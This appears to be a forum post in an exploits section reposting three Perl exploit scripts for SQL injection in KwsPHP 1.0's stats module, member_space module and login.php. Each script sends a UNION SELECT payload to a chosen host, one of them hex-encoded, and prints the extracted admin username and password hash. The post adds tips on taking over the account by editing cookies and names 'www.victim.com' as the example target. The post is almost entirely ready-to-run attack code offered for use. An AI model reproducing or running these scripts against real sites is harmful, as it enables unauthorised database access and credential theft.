Jump to content
Ras

KwsPHP stats/member_space/login.php Remote SQL Injections

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted

stats module:

###################################################
#  Script..........................: KwsPHP  ver 1.0 stats Module
#  Script Site..................: [url]http://kws.koogar.org/[/url]
#  Vulnerability...............: Remote SQL injection Exploit
#  Access.........................: Remote
#  level.............................: Dangerous
#  Author..........................: S4mi
#  Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit Work Only When magic_quotes_gpc Is OFF
#
#Usage  :       C:\Xploit.pl  127.0.0.1  /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################
#vuln code : \modules\stats\index.php  line ~ 700 - 720
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#   [code]
#    elseif(isset($aff) && ($aff=="browser"))
#   {
#   if(isset($typenav))
#   {
#      bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);
#      
#      $tot_nav=0;
#      
#      $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");
#      
#      while ($ligne = mysql_fetch_object($requete))
#      {
#         $tot_nav = $ligne->tot;
#      }
#      $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");
#

#########################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

$host = $ARGV[0];

$path = $ARGV[1];

$user = $ARGV[2];

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";

syswrite STDOUT ,"\n Sending Data ...";

print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Referer: $host\n";

print $sock "Accept-Language: en-us\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";

print $sock "Cache-Control: no-cache\n";

print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /nav_(.*?).png/){

print "+ Exploit succeed! Getting admin information.\n";

print "+ ---------------- +\n";

print "+ Username: $user\n";

print "+ Password: $1\n";

print "+ ----Have Fun---- +\n";

print "+ You don't need to crack the hash password :D\n";

print "+ Just login with ur owen information and edit the cookies\n";

}

}

sub usage{

print "\nUsage : perl $0 host /path/ UserName ";

print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";

exit(0);

}

sub header(){

print q(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Script......................: KwsPHP ver 1.0 stats Module

# Script Site.................: http://kws.koogar.org/

# Vulnerability...............: Remote SQL injection Exploit

# Access......................: Remote

# level.......................: Dangerous

# Author......................: S4mi

# Contact.....................: S4mi[at]LinuxMail.org

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

);

}

member_space module:

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$port = "80";

 print q(
################################################################
#  Script....................: KwsPHP v1.0 Member_Space Module #
#  Script Site...............: [url]http://kws.koogar.org/[/url]          #
#  Vulnerability.............: Remote SQL injection Exploit    #
#  Access....................: Remote                          #
#  level.....................: Dangerous                       #
#  Author....................: S4mi                            #
#  Contact...................: S4mi[at]LinuxMail.org           #
#        This Exploit Work Only When magic_quotes_gpc Is OFF   #
################### (C)oded By S4mi ############################

);


 if (@ARGV < 3) {
 print " #  usage : xpl.pl   host/path/     User Passwd\n";
 print " #    e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";
 exit();
 }

   print " [~] User/Password : $User/$passwd \n";
   print " [~] Host : $url \n";

 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 print " [~] Logining ...\n";
 $xpl->cookie_jar( $cookie_jar );
 $login = $xpl->post($url.'index.php',
 Content => [
 "pseudo" => "$User",
 "pass" => "$passwd",
 "submit" => "Se connecter",
 ],);

$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E"
      ."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E"
      ."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72"
      ."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31"
      ."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30"
      ."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68"
      ."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74"
      ."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31"
      ."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31"
      ."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73"
      ."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C"
      ."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73"
      ."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A"
      ."\x2F\x69\x64\x3D\x31\x2F\x2A";

$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61"
       ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64"
       ."\x69\x74\x65\x72\x26\x69\x64\x3D";

$target = $xpl->get($url."index.php?mod=$offset$evil0");



if($target->as_string =~ /value="username:(.*?"/) {
$zaz = $1;
print " [+] Exploit succeed! Getting admin information. \n";
print " [+] ------------------------------------------- \n";
}
if($target->as_string =~ /value="password:(.*?"/) {
$luks = $1;
print " [+] UserName : $zaz \n";
print " [+] Password : $luks \n";
}
else {
print " [-] Exploit Failed ! \n";
}
print "\n#############################################################\n";

login.php:

###################################################
#  Script..........................: KwsPHP  ver 1.0
#  Script Site..................: [url]http://kws.koogar.org/[/url]
#  Vulnerability...............: login.php Remote SQL injection Exploit
#  Access.........................: Remote
#  level.............................: Dangerous
#  Author..........................: S4mi
#  Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit  work Only When magic_quotes_gpc Is OFF
#
#Usage  :       C:\Xploit.pl  127.0.0.1  /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];


syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";   

syswrite STDOUT ,"\n Sending Data ...";

print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /class="messagelogin">(.*?) /){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ----------------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ -------Have Fun--------- +\n";
print "+ You don't need to crack the hash password \n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}

sub usage{
   print "\nUsage   : perl $0 host /path/ UserName ";
   print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n";
   exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#  Script......................: KwsPHP  ver 1.0
#  Script Site.................: [url]http://kws.koogar.org/[/url]
#  Vulnerability...............: Remote SQL injection Exploit
#  Access......................: Remote
#  level.......................: Dangerous
#  Author......................: S4mi
#  Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...